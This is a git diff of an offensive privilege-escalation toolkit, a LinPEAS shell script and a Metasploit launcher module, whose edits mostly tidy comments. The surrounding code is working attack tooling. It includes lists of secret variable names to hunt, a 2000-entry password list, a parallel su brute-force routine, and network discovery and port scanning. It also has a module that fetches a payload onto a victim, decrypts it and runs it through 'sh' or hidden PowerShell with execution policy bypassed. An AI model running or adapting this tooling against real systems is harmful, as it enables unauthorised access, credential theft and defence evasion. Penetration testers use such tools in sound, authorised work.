pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" @@ -488,9 +488,9 @@ katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \ andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \ plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" -PASSTRY="2000" #Default num of passwds to try (all by default) +PASSTRY="2000" # Default num of passwds to try (all by default) -if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi # If Network reduce the time on this SEDOVERFLOW=true for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do wgroups="$wgroups -group $grp -or " @@ -512,9 +512,9 @@ while $SEDOVERFLOW; do if [ $? -eq 0 ]; then SEDOVERFLOW=false else - MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 + MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) # If overflow of directories, check again with MAXPATH_FIND_W - 1 fi - if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop + if [ $MAXPATH_FIND_W -lt 1 ] ; then # Prevents infinite loop SEDOVERFLOW=false fi done @@ -690,20 +690,20 @@ print_2title(){ START_T2_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" + printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC # There are 10 "═" } print_3title(){ - printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" + printf ${BLUE}"══╣ $GREEN$1\n"$NC # There are 2 "═" } print_3title_no_nl(){ printf "\033[2K\r" - printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═" + printf ${BLUE}"══╣ $GREEN${1}..."$NC # There are 2 "═" } print_list(){ - printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" + printf ${BLUE}"═╣ $GREEN$1"$NC # There is 1 "═" } print_info(){ @@ -712,7 +712,7 @@ print_info(){ print_ps (){ (ls -d /proc/*/ 2>/dev/null | while read f; do - CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess + CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); # Delete my own sed processess if [ "$CMDLINE" ]; then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3); printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; @@ -732,14 +732,14 @@ su_try_pwd (){ su_brute_user_num (){ BFUSER=$1 TRIES=$2 - su_try_pwd "$BFUSER" "" & #Try without password - su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password - su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password + su_try_pwd "$BFUSER" "" & # Try without password + su_try_pwd "$BFUSER" "$BFUSER" & # Try username as password + su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & # Try reverse username as password if [ "$PASSWORD" ]; then - su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password + su_try_pwd "$BFUSER" "$PASSWORD" & # Try given password fi for i in $(seq "$TRIES"); do - su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000) + su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & # Try TOP TRIES of passwords (by default 2000) sleep 0.007 # To not overload the system done wait @@ -795,8 +795,8 @@ check_tcp_443(){ check_icmp(){ (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available" } -#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp -#I cannot use this function because timeout doesn't find it, so it's copy/pasted below +# DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp +# I cannot use this function because timeout doesn't find it, so it's copy/pasted below check_dns(){ (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available" } @@ -813,7 +813,7 @@ basic_net_info(){ } select_nc (){ - #Select the correct configuration of the netcat found + # Select the correct configuration of the netcat found NC_SCAN="$FOUND_NC -v -n -z -w 1" $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1) if [ $? -eq 2 ] @@ -823,7 +823,7 @@ select_nc (){ } icmp_recon (){ - #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) + # Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & @@ -836,7 +836,7 @@ icmp_recon (){ } tcp_recon (){ - #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones + # Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones IP3=$(echo $1 | cut -d "." -f 1,2,3) PORTS=$2 printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " @@ -856,7 +856,7 @@ tcp_recon (){ } tcp_port_scan (){ - #Scan open ports of a host. Default: nmap top 1000, but the user can select others + # Scan open ports of a host. Default: nmap top 1000, but the user can select others basic_net_info print_title "Network Port Scanning" @@ -884,7 +884,7 @@ tcp_port_scan (){ } discover_network (){ - #Check if IP and Netmask are correct and the use fping or ping to find hosts + # Check if IP and Netmask are correct and the use fping or ping to find hosts basic_net_info print_title "Network Discovery" @@ -899,11 +899,11 @@ discover_network (){ exit 0 fi - #Using fping if possible + # Using fping if possible if [ "$FPING" ]; then $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED}," - #Loop using ping + # Loop using ping else if [ "$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" @@ -926,7 +926,7 @@ discover_network (){ discovery_port_scan (){ basic_net_info - #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 + # Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 print_title "Internal Network Discovery - Finding hosts and scanning ports" DISCOVERY=$1 MYPORTS=$2 @@ -945,7 +945,7 @@ discovery_port_scan (){ fi PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')" - PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions + PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) # Delete repetitions if [ "$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC @@ -1039,7 +1039,7 @@ if [ "$PORTS" ]; then printf ${BLUE}"$HELP"$NC; exit 0 else - #Select the correct configuration of the netcat found + # Select the correct configuration of the netcat found select_nc fi else @@ -1083,12 +1083,12 @@ if [ "$PORT_FORWARD" ]; then exit 0 fi - #Check if LOCAL_PORT is a number + # Check if LOCAL_PORT is a number if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; fi - #Check if REMOTE_PORT is a number + # Check if REMOTE_PORT is a number if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; fi @@ -1098,7 +1098,7 @@ if [ "$PORT_FORWARD" ]; then fi -#Get HOMESEARCH +# Get HOMESEARCH if [ "$SEARCH_IN_FOLDER" ]; then HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/" else @@ -1138,7 +1138,7 @@ elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | g fi if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then - #GENERATE THE STORAGES OF THE FOUND FILES + # GENERATE THE STORAGES OF THE FOUND FILES peass{STORAGES_HERE} ##### POST SEARCH VARIABLES ##### diff --git a/metasploit/peass.rb b/metasploit/peass.rb index 0f9626a12..d8ec16f78 100644 --- a/metasploit/peass.rb +++ b/metasploit/peass.rb @@ -18,7 +18,7 @@ def initialize(info={}) 'Name' => 'Multi PEASS launcher', 'Description' => %q{ This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system. - You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows. + You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows. By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it. You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it. }, @@ -52,18 +52,18 @@ def initialize(info={}) end def run - ps_var1 = rand(36**5).to_s(36) #Winpeas PS needed variable + ps_var1 = rand(36**5).to_s(36) # Winpeas PS needed variable # Load PEASS script in memory peass_script = load_peass() - print_good("PEASS script successfully retreived.") + print_good("PEASS script successfully retrieved.") # Obfuscate loaded PEASS script if datastore["PASSWORD"].length > 1 # If no Windows, check if openssl exists if !session.platform.include?("win") openssl_path = cmd_exec("command -v openssl") - raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl") + raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl") end # Get encrypted PEASS script in B64 @@ -82,7 +82,7 @@ def run # As the PS function is only capable of decrypting readable strings # in Windows we encrypt the B64 of the binary and then load it in memory # from the initial B64. Then: original -> B64 -> encrypt -> B64 - aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) #Base64 before encrypting it + aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) # Base64 before encrypting it peass_script_64 = aes_enc_peass_ret["encrypted"] key_b64 = aes_enc_peass_ret["key_b64"] iv_b64 = aes_enc_peass_ret["iv_b64"] @@ -97,7 +97,7 @@ def run # If no Windows, check if base64 exists if !session.platform.include?("win") base64_path = cmd_exec("command -v base64") - raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64") + raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64") end # Encode PEASS script @@ -137,7 +137,7 @@ def run upload_file(temp_path, file.path) print_good("Uploaded") - #Start the cmd, prepare to read from the uploaded file + # Start the cmd, prepare to read from the uploaded file if session.platform.include?("win") cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};" last_cmd = "del #{temp_path};" @@ -146,7 +146,7 @@ def run last_cmd = " ; rm #{temp_path}" end - # Instead of writting the file to disk, download it from HTTP + # Instead of writing the file to disk, download it from HTTP else last_cmd = "" # Start HTTP server @@ -159,13 +159,13 @@ def run url_download_peass = http_protocol + http_ip + http_port + http_path print_good("Listening in #{url_download_peass}") - # Configure the download of the scrip in Windows + # Configure the download of the script in Windows if session.platform.include?("win") cmd = "$ProgressPreference = 'SilentlyContinue';" cmd += get_bypass_tls_cert() cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;" - # Configure the download of the scrip in unix + # Configure the download of the script in Unix else cmd = "curl -k -s \"#{url_download_peass}\"" curl_path = cmd_exec("command -v curl") @@ -193,7 +193,7 @@ def run tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i) - # If unix, then, suppose linpeas was loaded + # If Unix, then, suppose linpeas was loaded else cmd += "| #{decode_linpeass_cmd}" cmd += "| sh -s -- #{datastore['PARAMETERS']}" @@ -259,7 +259,7 @@ def load_peass end def aes_enc_peass(peass_script) - # Encrypt the PEASS script with aes + # Encrypt the PEASS script with AES (CBC Mode) key = datastore["PASSWORD"] iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv @@ -333,7 +333,7 @@ def get_ps_aes_decr $csDecrypt = new-object System.Security.Cryptography.CryptoStream($msDecrypt, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read) $srDecrypt = new-object System.IO.StreamReader($csDecrypt) - #Write all data to the stream. + # Write all data to the stream. $plainText = $srDecrypt.ReadToEnd() $srDecrypt.Close() $csDecrypt.Close()